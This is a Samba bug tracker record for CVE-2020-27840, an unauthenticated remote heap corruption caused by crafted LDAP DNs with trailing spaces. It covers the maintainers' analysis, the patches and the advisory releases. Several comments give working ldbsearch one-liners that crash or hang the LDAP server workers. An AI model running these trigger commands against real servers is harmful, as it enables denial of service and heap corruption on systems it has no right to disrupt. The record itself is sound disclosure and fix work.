Bug 14595 (CVE-2020-27840) - CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
Summary: CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
Status: RESOLVED FIXED
Alias: CVE-2020-27840
Product: Samba 4.1 and newer
Classification: Unclassified
Component: AD: LDB/DSDB/SAMDB (show other bugs)
Version: unspecified
Hardware: All All
: P5 normal (vote)
Target Milestone: ---
Assignee: Karolin Seeger
QA Contact: Samba QA Contact
URL:
Keywords:
Depends on:
Blocks: 14661
  Show dependency treegraph
 
Reported: 2020-12-11 03:42 UTC by Douglas Bagnall
Modified: 2021-05-03 00:52 UTC (History)
7 users (show)

See Also:


Attachments
proof of concept (2.83 KB, patch)
2020-12-11 03:42 UTC, Douglas Bagnall
no flags Details
the immediate fix (726 bytes, patch)
2020-12-11 03:42 UTC, Douglas Bagnall
no flags Details
Advisory v1 (1.81 KB, text/plain)
2021-01-08 01:43 UTC, Douglas Bagnall
no flags Details
patch with more explanatory text. (3.98 KB, patch)
2021-02-11 02:25 UTC, Douglas Bagnall
no flags Details
Advisory v2 (2.41 KB, text/plain)
2021-02-11 02:25 UTC, Douglas Bagnall
abartlet: review+
Details
patch for master (9.04 KB, patch)
2021-02-11 22:38 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
patch for 4.14 (9.04 KB, patch)
2021-02-11 22:39 UTC, Douglas Bagnall
abartlet: review+
Details
patch for 4.13 (9.04 KB, patch)
2021-02-11 22:39 UTC, Douglas Bagnall
abartlet: review+
Details
patch for 4.12 (9.04 KB, patch)
2021-02-11 22:40 UTC, Douglas Bagnall
abartlet: review+
Details
patch for 4.11 (9.32 KB, patch)
2021-02-11 22:41 UTC, Douglas Bagnall
abartlet: review+
Details
patch for unsupported Samba 4 versions (3.99 KB, patch)
2021-02-11 22:51 UTC, Douglas Bagnall
no flags Details
patch for master (v2, with Reviewed-by: abartlet) (9.18 KB, patch)
2021-02-16 22:38 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
patch for 4.14 v2 (9.18 KB, patch)
2021-02-16 22:40 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
patch for 4.13 v2 (9.18 KB, patch)
2021-02-16 22:40 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
patch for 4.12 v2 (9.18 KB, patch)
2021-02-16 22:41 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
patch for 4.11 v2 (9.47 KB, patch)
2021-02-16 22:42 UTC, Douglas Bagnall
abartlet: review+
dbagnall: ci-passed+
Details
Updated Advisory v3 including version numbers (2.43 KB, text/plain)
2021-03-12 08:43 UTC, Karolin Seeger
dbagnall: review-
abartlet: review+
Details
Updated advisory v4 (2.43 KB, text/plain)
2021-03-15 08:04 UTC, Karolin Seeger
dbagnall: review+
Details

Note You need to log in before you can comment on or make changes to this bug.
Description Douglas Bagnall 2020-12-11 03:42:08 UTC
Created attachment 16365 [details]
proof of concept

A DN string with particular patterns of trailing space can cause ldb_dn_explodes to wander away and put zero bytes in arbitrary places in the heap.

From the proof of concept:

$ valgrind bin/default/lib/ldb/explode_ldb_dn_explode 
==1732366== Memcheck, a memory error detector
==1732366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1732366== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1732366== Command: bin/default/lib/ldb/explode_ldb_dn_explode
==1732366== 
==1732366== Invalid write of size 1
==1732366==    at 0x48667CE: ldb_dn_explode (ldb_dn.c:722)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366==  Address 0x4c157a7 is 9 bytes before a block of size 211 alloc'd
==1732366==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1732366==    by 0x4AD2365: __talloc_with_prefix (talloc.c:783)
==1732366==    by 0x4AD24FF: __talloc (talloc.c:825)
==1732366==    by 0x4AD299C: _talloc_named_const (talloc.c:982)
==1732366==    by 0x4AD6B26: _talloc_array (talloc.c:2763)
==1732366==    by 0x4865B71: ldb_dn_explode (ldb_dn.c:343)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366== 
==1732366== 


This is due to interactions between the way trailing space and leading space are handled.

I have a simple fix for this one, and an ongoing series of patches to stop ldb_dn_explode doing this to us.
Comment 1 Douglas Bagnall 2020-12-11 03:42:44 UTC
Created attachment 16366 [details]
the immediate fix
Comment 2 Douglas Bagnall 2020-12-11 03:46:48 UTC
found with the help of Honggfuzz.
Comment 3 Douglas Bagnall 2020-12-12 22:06:17 UTC
Following the logic of bug #14049, this might not be a security issue, because it can't be remotely triggered.

OTOH, there might be a way to connect these e.g. dots:

1. ldap_decode()

2. case ASN1_APPLICATION() => asn1_read_OctetString_talloc(), we have the verbatim crafted DN string.

2. ldapsrv_BindSimple() calls authenticate_ldap_simple_bind_send() with the dn as name.

3. ...a maze of cracknames...

4. DsCrackNameOneName():

	/* A LDAP DN as a string */
	case DRSUAPI_DS_NAME_FORMAT_FQDN_1779: {
		domain_filter = NULL;
		name_dn = ldb_dn_new(mem_ctx, sam_ctx, name);
		if (! ldb_dn_validate(name_dn)) {
Comment 4 Douglas Bagnall 2020-12-12 22:27:52 UTC
The trouble of course is in constructing the ASN1.

Using the ldb clients of course crashes on the client side:

$ bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD -b "$(printf 'a=b%*s,c= ' 600 ' ')"
corrupted double-linked list
^C

and other ldap tools just don't seem to want to do it.
Comment 5 Douglas Bagnall 2020-12-13 06:04:14 UTC
It's actually quite easy using attributes.

This kills all the ldap workers in my testenv:

for i in {1..20}; do  x=$((i * 20)); echo $x; bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD  "(member=$(printf 'a=b%*s,c= ' $x ' '))" ; done
Comment 6 Douglas Bagnall 2020-12-13 19:44:35 UTC
This in a testenv:

$ for i in {1..200}; do  x=$((i * 99)); echo $x; bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' $x ' ')" --password=sdfsdfsd -kno  ; done

causes "corrupted double-linked list" and/or crashes on the server.
Comment 7 Douglas Bagnall 2020-12-13 20:09:17 UTC
(In reply to Douglas Bagnall from comment #6)

At some offsets, like '106':

$ bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' 106 ' ')" --password=sdfsdfsd -kno


I get "free(): invalid pointer" and the worker hangs on __lll_lock_wait_private (), so the parent does not restart it (as would happen with a segfault or abort).

Even as a DoS, heap corruption is worse.
Comment 8 Andrew Bartlett 2020-12-14 00:01:05 UTC
CVSSv3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) for the DoS only, but I agree, this is likely worse (but how much worse is hard to know). 

I've requested a CVE number from Red hat.
Comment 9 Douglas Bagnall 2021-01-08 01:43:07 UTC
Created attachment 16383 [details]
Advisory v1
Comment 10 Douglas Bagnall 2021-02-11 02:23:47 UTC
Confirmed in various Samba versions from 4.1 to 4.13.
Comment 11 Douglas Bagnall 2021-02-11 02:25:10 UTC
Created attachment 16441 [details]
patch with more explanatory text.
Comment 12 Douglas Bagnall 2021-02-11 02:25:48 UTC
Created attachment 16442 [details]
Advisory v2
Comment 13 Douglas Bagnall 2021-02-11 22:38:48 UTC
Created attachment 16444 [details]
patch for master
Comment 14 Douglas Bagnall 2021-02-11 22:39:28 UTC
Created attachment 16445 [details]
patch for 4.14
Comment 15 Douglas Bagnall 2021-02-11 22:39:57 UTC
Created attachment 16446 [details]
patch for 4.13
Comment 16 Douglas Bagnall 2021-02-11 22:40:24 UTC
Created attachment 16447 [details]
patch for 4.12
Comment 17 Douglas Bagnall 2021-02-11 22:41:01 UTC
Created attachment 16448 [details]
patch for 4.11
Comment 18 Douglas Bagnall 2021-02-11 22:51:05 UTC
Created attachment 16449 [details]
patch for unsupported Samba 4 versions

The "patch for unsupported Samba 4 versions" applies to 4.5 and should work on anything from 4.0 to 4.10. It doesn't have the tests. To test on these platforms, use the proof of concept patch or the shell snippets in the comments here (or, better still, UPGRADE).

Patches for master, 4.14, 4.13, 4.12 are all essentially identical.

The patch for 4.11 differs only because the surrounding tests have changed in the meantime.
Comment 19 Andrew Bartlett 2021-02-16 00:37:22 UTC
Even with the clear explanation in the commit message, this makes my head spin.
Comment 20 Douglas Bagnall 2021-02-16 22:38:34 UTC
Created attachment 16460 [details]
patch for master (v2, with Reviewed-by: abartlet)
Comment 21 Douglas Bagnall 2021-02-16 22:40:15 UTC
Created attachment 16461 [details]
patch for 4.14 v2
Comment 22 Douglas Bagnall 2021-02-16 22:40:59 UTC
Created attachment 16462 [details]
patch for 4.13 v2
Comment 23 Douglas Bagnall 2021-02-16 22:41:35 UTC
Created attachment 16463 [details]
patch for 4.12 v2
Comment 24 Douglas Bagnall 2021-02-16 22:42:25 UTC
Created attachment 16464 [details]
patch for 4.11 v2
Comment 25 Andrew Bartlett 2021-02-17 08:04:40 UTC
I think there is just CI and filling in the $VERSIONS to go on this one, and then it will be ready.
Comment 26 Douglas Bagnall 2021-02-17 20:40:48 UTC
Advisory $VERSIONS is still to be determined.
Comment 27 Andrew Bartlett 2021-02-26 19:32:43 UTC
Is this the same as bug 10122 reported in 2013?
Comment 28 Douglas Bagnall 2021-02-28 00:20:39 UTC
(In reply to Andrew Bartlett from comment #27)
> Is this the same as bug 10122 reported in 2013?

I think not. The whitespace in examples there consists mostly or wholy of line breaks, and only one or two of them. This bug only affects real 0x20 space characters.
Comment 29 Karolin Seeger 2021-03-12 08:43:41 UTC
Created attachment 16530 [details]
Updated Advisory v3 including version numbers

Add version numbers, a username -> an username
Comment 30 Douglas Bagnall 2021-03-12 23:45:55 UTC
Comment on attachment 16530 [details]
Updated Advisory v3 including version numbers

Actually "a username" seems more correct to me.

I have a funny dialect, but Google agrees.
Comment 31 Karolin Seeger 2021-03-15 08:04:34 UTC
Created attachment 16547 [details]
Updated advisory v4

an username -> a username
Comment 32 Karolin Seeger 2021-03-15 10:17:34 UTC
Planned release date 2021-03-24.
Comment 33 Samba QA Contact 2021-03-24 08:56:38 UTC
This bug was referenced in samba v4-14-stable (Release samba-4.14.1):

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21
Comment 34 Samba QA Contact 2021-03-24 08:57:37 UTC
This bug was referenced in samba v4-13-stable (Release samba-4.13.6):

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d
Comment 35 Samba QA Contact 2021-03-24 08:59:02 UTC
This bug was referenced in samba v4-12-stable (Release samba-4.12.13):

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80
Comment 36 Samba QA Contact 2021-03-24 10:37:59 UTC
This bug was referenced in samba v4-12-test:

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80
Comment 37 Samba QA Contact 2021-03-24 10:53:19 UTC
This bug was referenced in samba v4-13-test:

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d
Comment 38 Samba QA Contact 2021-03-24 10:56:54 UTC
This bug was referenced in samba v4-14-test:

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21
Comment 39 Stefan Metzmacher 2021-03-24 11:03:49 UTC
Note the following additional releases were made in order to
have standalone ldb releases with the fixes and let Samba depend on
them when using system libraries:

samba-4.12.14 (with ldb-2.1.5)
samba-4.13.7  (with ldb-2.2.1)
samba-4.14.2  (with ldb-2.3.0)
Comment 40 Samba QA Contact 2021-03-24 13:12:03 UTC
This bug was referenced in samba master:

1996b79f376b459bb964a6344ca5f264e7d6e2ec
dbb3e65f7e382adf5fa6a6afb3d8684aca3f201a
9532c44baea130db74f866e1472cb871936cd3dd
Comment 41 Karolin Seeger 2021-03-25 10:02:39 UTC
Samba 4.14.2 (4.14.1), 4.13.7 (4.13.6) and 4.12.14 (4.12.13) have been shipped to address this defect.
Closing out bug report.

Thanks!
Comment 42 Douglas Bagnall 2021-05-01 01:53:38 UTC
Belatedly making this public.
Comment 43 Andrew Bartlett 2021-05-03 00:52:15 UTC
Removing samba-vendor from CC.  Subscribe manually with your own account on the CC if you need to follow along from here.